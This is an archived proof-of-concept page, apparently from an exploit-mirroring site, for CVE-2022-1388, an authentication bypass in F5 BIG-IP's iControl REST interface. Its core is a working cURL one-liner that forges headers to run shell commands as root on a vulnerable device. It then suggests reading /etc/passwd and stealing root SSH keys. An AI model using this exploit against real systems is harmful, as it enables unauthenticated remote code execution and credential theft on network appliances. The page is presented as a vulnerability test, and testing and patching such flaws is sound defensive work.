CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source

https://github.com/OnCyberWar/CVE-2022-1388

Associated Vulnerability

Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞，攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。

Description

cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE

Readme

# CVE-2022-1388 BIG IP REST RCE

On F5 BIG-IP 16.1.x versions prior to 16.1.2.2., 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.

Use the following cURL one-liner to test for this vulnerability.

```curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'```

The Authorization field can be any base64 encoded value. The example above uses admin:admin. These do NOT need to be valid credentials, if the server is vulnerable any base64 encoded value will work.

If the above command returns the ID, you can attempt a number of things such as reading /etc/passwd with 'cat /etc/passwd', or try grabbing the root SSH certy with 'cat /root/.ssh/identity'.

File Snapshot


 [4.0K]  /data/pocs/e6f7b20e133c1d708fcbd1133aec0bc032eae9d9
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!